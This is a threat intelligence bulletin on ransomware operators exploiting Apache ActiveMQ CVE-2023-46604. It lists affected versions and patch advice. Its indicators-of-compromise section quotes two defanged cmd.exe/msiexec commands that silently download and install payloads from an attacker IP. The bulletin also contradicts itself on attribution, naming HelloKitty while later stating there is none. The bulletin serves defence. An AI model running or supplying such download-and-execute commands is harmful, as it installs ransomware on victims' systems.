Home / Threat Intelligence bulletins / Ransomware operation exploits Apache ActiveMQ vulnerability

Target Industry

Indiscriminate, opportunistic targeting.

Overview

Intelligence indicates that a recently disclosed Apache ActiveMQ vulnerability, tracked as CVE-2023-46604 (CVSSv3.1 score: 10.0), has been exploited by HelloKitty ransomware operators. The assessment has been made based on the contents of the ransom note and the technical analysis of the associated malware source code.

On 2nd November 2023, CVE-2023-46604 was added to the Cybersecurity & Infrastructure Security Agency (CISA) Known Exploited Vulnerability (KEV) Catalog.

Impact

It has been assessed that successful exploitation of CVE-2023-46604 would almost certainly result in threat actors gaining remote code execution capabilities on target systems.

Vulnerability Detection

Apache has released a security update regarding the affected product versions. As such, previous versions are vulnerable to potential exploitation.

 Affected Products

CVE-2023-46604 affects the following Apache ActiveMQ versions:

Apache ActiveMQ 5.18.0 before 5.18.3

Apache ActiveMQ 5.17.0 before 5.17.6

Apache ActiveMQ 5.16.0 before 5.16.7

Apache ActiveMQ before 5.15.16

Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3

Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6

Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7

Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Containment, Mitigations & Remediations

It is strongly recommended that users of the affected product versions apply the released Apache security update. A remediation was addressed in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3 released late last month.

Indicators of Compromise

Network Indicators:

172.245.16[.]125

 

URL Indicators:

hxxp[://]172.245.16[.]125/m2[.]png

hxxp[]://]172.245.16[.]125/m4[.]png

 

File Hash Indicators (SHA-256):

M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4

M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0

dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7

EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5

 

File Indicators:

cmd.exe /c “start msiexec /q /i hxxp://172.245.16[.]125/m4.png”

cmd.exe /c “start msiexec /q /i hxxp://172.245.16[.]125/m2.png”

Threat Landscape

Apache ActiveMQ occupies a significant portion of the enterprise application integration market share. The related products are used extensively by organisations across the industry sector spectrum. Within this context, it has been assessed that cyber threat actors will almost certainly view organisations with operational protocols involving these products as prime targets as they seek to meet their pre-defined objectives.

Due to CVE-2023-46604 having already been subjected to malicious cyber operations, it is of critical importance to follow the recommended remediation strategies to reduce the risk of exploitation.

Threat Group

No attribution to specific threat actors or groups has been identified at the time of writing.

Mitre Methodologies

Common Weakness Enumeration (CWE):

CWE-502– Deserialization of Untrusted Data

Further Information

Rapid7 Blog

 

An Intelligence Terminology Yardstick to showing the likelihood of events